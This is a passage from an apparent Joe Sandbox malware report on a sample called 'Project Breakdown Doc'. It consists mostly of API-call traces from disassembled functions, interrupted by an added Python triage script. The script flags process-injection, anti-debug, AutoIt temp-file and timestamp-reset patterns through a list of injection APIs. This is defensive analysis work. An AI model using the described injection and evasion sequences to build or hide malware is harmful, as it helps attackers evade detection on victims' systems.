                                                  • Snapshot File: hcaresult_0_2_1780000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                  • String ID:
                                                  • API String ID: 2438371351-0
                                                  • Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                  • Instruction ID: 01d54b3fa1162e1cc06a745d0329e84b191c7672c206ff822cfcf4cfd76fecbe
                                                  • Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                  • Instruction Fuzzy Hash: 91622930A54218DBEB24DFA4C850BDEB772EF58300F5091A9D20DEB394E7799E81CB59
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                  • String ID:
                                                  • API String ID: 2782032738-0
                                                  • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                  • Instruction ID: e62bb23017469e316f93dcb6ee4cab9eecd9298bca57d8bb722c7dfb9a7ae43f
                                                  • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                  • Instruction Fuzzy Hash: 8141B575640606AFDF3CDEA9C8C09AF7BAAEF80360B24817DE865C7641D7709E419B44
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C7EE62
                                                  • GetOpenFileNameW.COMDLG32(?), ref: 00C7EEAC
                                                    • Part of subcall function 00C448AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C448A1,?,?,00C437C0,?), ref: 00C448CE
                                                    • Part of subcall function 00C609D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C609F4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Name$Path$FileFullLongOpen_memset
                                                  • String ID: X
                                                  • API String ID: 3777226403-3081909835
                                                  • Opcode ID: 2a5dc7221fda8143605e2167582831c9bad3e286a2e2ec9de7910da0e20bd1ae
                                                  • Instruction ID: 2bbc89e5f52b4b0ef2ac34558b8d908cee59067b362389526e121e729a5d484f
                                                  • Opcode Fuzzy Hash: 2a5dc7221fda8143605e2167582831c9bad3e286a2e2ec9de7910da0e20bd1ae
                                                  • Instruction Fuzzy Hash: FF210571A1028C9BCF11DF94C845BEE7BF8AF49300F00805AE408F7281DBB44A899FA1
                                                  APIs
                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00CA9B82
                                                  • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00CA9B99
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Temp$FileNamePath
                                                  • String ID: aut
                                                  • API String ID: 3285503233-3010740371
                                                  • Opcode ID: 37339a53de63a91ee903217ecdfdb7549b75eb66b05e5e061ee84ec34261153d
                                                  • Instruction ID: c2595821313a878e2c2e01c0202c5e392c9b5ede9f3b692eca1f58dac1345fae
                                                  • Opcode Fuzzy Hash: 37339a53de63a91ee903217ecdfdb7549b75eb66b05e5e061ee84ec34261153d
                                                  • Instruction Fuzzy Hash: 7CD05EBA54030DABDB509B90DC0EFAABB2CE704700F0042B1FF94920A1DEB055998B92
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ce22e0d61c8bd7c77c907064a891b91ced8ef76f1d7027eca573a6086ffea28e
                                                  • Instruction ID: 06141a24c323d042c4e52601743a8f056b1682ba62f744aadf53317fa58b95fd
                                                  • Opcode Fuzzy Hash: ce22e0d61c8bd7c77c907064a891b91ced8ef76f1d7027eca573a6086ffea28e
                                                  • Instruction Fuzzy Hash: CDF139716083519FCB14DF28C484A6ABBE5FF88314F14896EF8AA9B351D731E945CF82
                                                  APIs
                                                    • Part of subcall function 00C603A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C603D3
                                                    • Part of subcall function 00C603A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00C603DB
                                                    • Part of subcall function 00C603A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C603E6
                                                    • Part of subcall function 00C603A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C603F1
                                                    • Part of subcall function 00C603A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00C603F9
                                                    • Part of subcall function 00C603A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00C60401
                                                    • Part of subcall function 00C56259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00C4FA90), ref: 00C562B4
                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00C4FB2D
                                                  • OleInitialize.OLE32(00000000), ref: 00C4FBAA
                                                  • CloseHandle.KERNEL32(00000000), ref: 00C849F2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                  • String ID:
                                                  • API String ID: 1986988660-0
                                                  • Opcode ID: 8f2a28ac60aaa84f785a013be16b6957c52169abb0bc088f86026ee221e8be4c
                                                  • Instruction ID: d62c25c2b00c9055f6c2a329a1537e28f94764ef119cc0e95543e617b84bbbb1
                                                  • Opcode Fuzzy Hash: 8f2a28ac60aaa84f785a013be16b6957c52169abb0bc088f86026ee221e8be4c
                                                  • Instruction Fuzzy Hash: 1681A7B09093508EC784DF3AED947197AE5FB89708714812EE41CC73A2EB71C4698F71
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C44401
                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C444A6
                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C444C3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: IconNotifyShell_$_memset
                                                  • String ID:
                                                  • API String ID: 1505330794-0
                                                  • Opcode ID: 95a5f1d475b2dcd25f0eb1fbf817d2379787067062a61a73c6410cfea41440ca
                                                  • Instruction ID: d9ed318300284b5f996fcf0b8d3b97c62cb9c7dadeb9074183a8fd3d844f7c2b
                                                  • Opcode Fuzzy Hash: 95a5f1d475b2dcd25f0eb1fbf817d2379787067062a61a73c6410cfea41440ca
                                                  • Instruction Fuzzy Hash: 76317AB05057018FD724DF34D884B9BBBE8FB48308F10092EF59AC2241E7B1AA48CB96
                                                  APIs
                                                  • __FF_MSGBANNER.LIBCMT ref: 00C65963
                                                    • Part of subcall function 00C6A3AB: __NMSG_WRITE.LIBCMT ref: 00C6A3D2
                                                    • Part of subcall function 00C6A3AB: __NMSG_WRITE.LIBCMT ref: 00C6A3DC
                                                  • __NMSG_WRITE.LIBCMT ref: 00C6596A
                                                    • Part of subcall function 00C6A408: GetModuleFileNameW.KERNEL32(00000000,00D043BA,00000104,?,00000001,00000000), ref: 00C6A49A
                                                    • Part of subcall function 00C6A408: ___crtMessageBoxW.LIBCMT ref: 00C6A548
                                                    • Part of subcall function 00C632DF: ___crtCorExitProcess.LIBCMT ref: 00C632E5
                                                    • Part of subcall function 00C632DF: ExitProcess.KERNEL32 ref: 00C632EE
                                                    • Part of subcall function 00C68D68: __getptd_noexit.LIBCMT ref: 00C68D68
                                                  • RtlAllocateHeap.NTDLL(01790000,00000000,00000001,00000000,?,?,?,00C61013,?), ref: 00C6598F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                  • String ID:
                                                  • API String ID: 1372826849-0
                                                  • Opcode ID: b81363cea5e79f2f22ff7130f7b07bd98f4c50c010c462b1077498edd601b27f
                                                  • Instruction ID: 90dd220d05059aafb950dd00ce667e899109537afdf8482f2e2853beacefb13b
                                                  • Opcode Fuzzy Hash: b81363cea5e79f2f22ff7130f7b07bd98f4c50c010c462b1077498edd601b27f
                                                  • Instruction Fuzzy Hash: 53019E31345B16DEE6313B75ECC2B6E72989F42770F20012AF615AB2D2DE709E42A674
                                                  APIs
                                                  • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00CA97D2,?,?,?,?,?,00000004), ref: 00CA9B45
                                                  • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00CA97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00CA9B5B
                                                  • CloseHandle.KERNEL32(00000000,?,00CA97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00CA9B62
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleTime
                                                  • String ID:
                                                  • API String ID: 3397143404-0
                                                  • Opcode ID: 46c720a0750d75dcb252e3ff98f564682847011c66898fb480810d5dc381dc53
                                                  • Instruction ID: c1e2b35552745993a985c0f0346a37919d891e185b023d244ee2e2b25fe9711e
                                                  • Opcode Fuzzy Hash: 46c720a0750d75dcb252e3ff98f564682847011c66898fb480810d5dc381dc53
                                                  • Instruction Fuzzy Hash: 78E08632180214B7EB321B54EC0AFDE7B19EB05765F144124FB24690E087B126129798
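Three of the function blocks above are the ones an analyst would pull out of this listing first: the CreateProcessW / Wow64GetThreadContext / ReadProcessMemory sequence that lives at offset 01780000 in a region the dump marks "based on PE: false" (code that was written to memory rather than loaded from the image, which is how the injection signatures in the overview are reached); the GetTempPathW / GetTempFileNameW call with the "aut" prefix, the pattern the AutoIt runtime uses for its extracted script in %TEMP%; and the CreateFileW(GENERIC_WRITE) / SetFileTime / CloseHandle block, which resets timestamps on a file the sample has just written. The script below is an added triage example, not Joe Sandbox code and not anything recovered from the sample: it parses the plain-text form of these per-function blocks and flags those three patterns plus IsDebuggerPresent. The rule names, the INJECTION_APIS set and the reading of "aut" as the AutoIt prefix are this example's own assumptions; the sample input consists of lines copied from this report with the hash values truncated (and one hash that is not shown on this page replaced by a placeholder).

```python
"""Added example: triage Joe Sandbox per-function API summaries (not Joe Sandbox code)."""
import re
from typing import List, Optional, Tuple

Call = Tuple[str, str, List[str]]      # (api name, module, argument list)
Finding = Tuple[str, str]              # (rule name, detail)

# "• Name.MODULE(args), ref: ADDR", optionally prefixed "Part of subcall function X:".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
PE_BACKED = re.compile(r"based on PE:\s*(true|false)", re.IGNORECASE)
BLOCK_END = "• Instruction Fuzzy Hash:"   # last line of every function block on the page

# Assumed indicator set (this example's choice, not a Joe Sandbox signature): APIs that
# together with CreateProcess make up the usual hollowing / thread-hijack pattern.
INJECTION_APIS = {
    "Wow64GetThreadContext", "GetThreadContext", "Wow64SetThreadContext",
    "SetThreadContext", "ReadProcessMemory", "WriteProcessMemory",
    "NtUnmapViewOfSection", "QueueUserAPC", "ResumeThread",
}
GENERIC_WRITE = 0x40000000


def parse_blocks(text: str) -> List[Tuple[List[Call], Optional[bool]]]:
    """Split report text into (calls, pe_backed) per function block."""
    blocks, calls, pe_backed = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
            calls.append((m.group("name"), m.group("module"), args))
            continue
        m = PE_BACKED.search(line)
        if m and pe_backed is None:
            pe_backed = m.group(1).lower() == "true"
        elif line.startswith(BLOCK_END):
            blocks.append((calls, pe_backed))
            calls, pe_backed = [], None
    return blocks


def _has_write_access(arg: str) -> bool:
    try:
        return bool(int(arg, 16) & GENERIC_WRITE)
    except ValueError:                 # "?" = argument the sandbox could not resolve
        return False


def triage(calls: List[Call], pe_backed: Optional[bool]) -> List[Finding]:
    findings: List[Finding] = []
    names = [c[0] for c in calls]
    if {"CreateProcessW", "CreateProcessA"} & set(names):
        hits = sorted(set(names) & INJECTION_APIS)
        if hits:   # creating a process and then touching its context/memory
            where = "non-PE-backed memory" if pe_backed is False else "image-backed memory"
            findings.append(("process-manipulation",
                             "CreateProcess + " + ", ".join(hits) + " in " + where))
    for i, (name, _mod, args) in enumerate(calls):
        if name == "GetTempFileNameW" and len(args) > 1 and args[1] == "aut":
            # Assumption: "aut" is the AutoIt runtime's %TEMP%\aut*.tmp prefix.
            findings.append(("autoit-temp-file", "GetTempFileNameW prefix 'aut'"))
        elif name == "IsDebuggerPresent":
            findings.append(("anti-debug", "IsDebuggerPresent reached from this function"))
        elif (name == "CreateFileW" and len(args) > 1 and _has_write_access(args[1])
              and "SetFileTime" in names[i + 1:]):
            findings.append(("timestomp-candidate",
                             "CreateFileW(GENERIC_WRITE) followed by SetFileTime"))
    return findings


def scan(text: str) -> List[List[Finding]]:
    return [triage(calls, pe) for calls, pe in parse_blocks(text)]


# Constructed sample: five blocks copied from this report, hash values truncated.
SAMPLE_REPORT = """\
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 01781A5B
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01781AF1
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01781B13
• Source File: 00000000.00000002.1686208075.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
• Instruction Fuzzy Hash: 91622930A54218DB
APIs
• GetTempPathW.KERNEL32(00000104,?), ref: 00CA9B82
• GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00CA9B99
• Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
• Instruction Fuzzy Hash: 7CD05EBA54030DAB
APIs
• _memset.LIBCMT ref: 00C44401
• Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C444A6
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C444C3
• Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
• Instruction Fuzzy Hash: 76317AB05057018F
APIs
• CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00CA97D2,?,?,?,?,?,00000004), ref: 00CA9B45
• SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00CA97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00CA9B5B
• CloseHandle.KERNEL32(00000000,?,00CA97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00CA9B62
• Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
• Instruction Fuzzy Hash: 78E08632180214B7
APIs
• IsThemeActive.UXTHEME ref: 00C44992
  • Part of subcall function 00C43B4C: IsDebuggerPresent.KERNEL32 ref: 00C43B8C
• SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C449D2
• Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
• Instruction Fuzzy Hash: (not shown on this page)
"""

if __name__ == "__main__":
    for i, findings in enumerate(scan(SAMPLE_REPORT)):
        print(f"block {i}: {findings or 'no findings'}")
```

The "based on PE" flag is what separates the first block from ordinary API usage: CreateProcess followed by context reads is unremarkable inside a legitimate image, but the same sequence executing from a region with no file backing is the hallmark of an unpacked stage, and the script records that distinction in the finding text rather than scoring both cases alike. Subcall lines are treated as part of the calling function, which is also how the report attributes them.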
                                                  APIs
                                                  • _free.LIBCMT ref: 00CA8FA5
                                                    • Part of subcall function 00C62F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00C69C64), ref: 00C62FA9
                                                    • Part of subcall function 00C62F95: GetLastError.KERNEL32(00000000,?,00C69C64), ref: 00C62FBB
                                                  • _free.LIBCMT ref: 00CA8FB6
                                                  • _free.LIBCMT ref: 00CA8FC8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                                  • Instruction ID: 739142cea1501ac0651de27ea3c03b7ee283d8e038e20f63d231e108aeee8178
                                                  • Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                                  • Instruction Fuzzy Hash: 35E0C2A1A08B134FCA30A5F8AD80A8357EE0F48351708080DB419DB142CE24E940A024
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: CALL
                                                  • API String ID: 0-4196123274
                                                  • Opcode ID: bb8a99ba5690644483501b3e3b79b8633bcb290305ddb931f3928a47041a9e62
                                                  • Instruction ID: f77f52b4000ba522e8328a928325026dfd95738df0200ddde0313ac3b432550c
                                                  • Opcode Fuzzy Hash: bb8a99ba5690644483501b3e3b79b8633bcb290305ddb931f3928a47041a9e62
                                                  • Instruction Fuzzy Hash: 70224674508251DFCB24DF14C494B6ABBE1FF84304F19895DE89A8B362D731ED85DB82
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID: EA06
                                                  • API String ID: 4104443479-3962188686
                                                  • Opcode ID: 34f116816b460528b10248cacb3e93f6a2ecdc77ec1504aa0c0e02c400997872
                                                  • Instruction ID: 2a93053abd24d67e89e3708099ca1d22f420a94aceefcf92dbbb8be80b2b2a2e
                                                  • Opcode Fuzzy Hash: 34f116816b460528b10248cacb3e93f6a2ecdc77ec1504aa0c0e02c400997872
                                                  • Instruction Fuzzy Hash: AC415A71A045586BDF299F64C8917BEFFB6BF05300F784065F982AB283C6319E44A7A1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID:
                                                  • API String ID: 4104443479-0
                                                  • Opcode ID: 888ce228c65e5e126e2c0d83d6bef63a0f4650b727a1fb86e52d4496ebb79edc
                                                  • Instruction ID: 97dd8d7c1013ee3b40616ced6c26f53cc9218f52608e5fbbeceb2eb69747b6dc
                                                  • Opcode Fuzzy Hash: 888ce228c65e5e126e2c0d83d6bef63a0f4650b727a1fb86e52d4496ebb79edc
                                                  • Instruction Fuzzy Hash: 1631C5B1604606AFC714DF68D9D1E6AF3A9FF483107158729F929CB391DB70E960CB90
                                                  APIs
                                                  • IsThemeActive.UXTHEME ref: 00C44992
                                                    • Part of subcall function 00C635AC: __lock.LIBCMT ref: 00C635B2
                                                    • Part of subcall function 00C635AC: DecodePointer.KERNEL32(00000001,?,00C449A7,00C981BC), ref: 00C635BE
                                                    • Part of subcall function 00C635AC: EncodePointer.KERNEL32(?,?,00C449A7,00C981BC), ref: 00C635C9
                                                    • Part of subcall function 00C44A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00C44A73
                                                    • Part of subcall function 00C44A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C44A88
                                                    • Part of subcall function 00C43B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C43B7A
                                                    • Part of subcall function 00C43B4C: IsDebuggerPresent.KERNEL32 ref: 00C43B8C
                                                    • Part of subcall function 00C43B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00D062F8,00D062E0,?,?), ref: 00C43BFD
                                                    • Part of subcall function 00C43B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00C43C81
                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C449D2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                  • String ID:
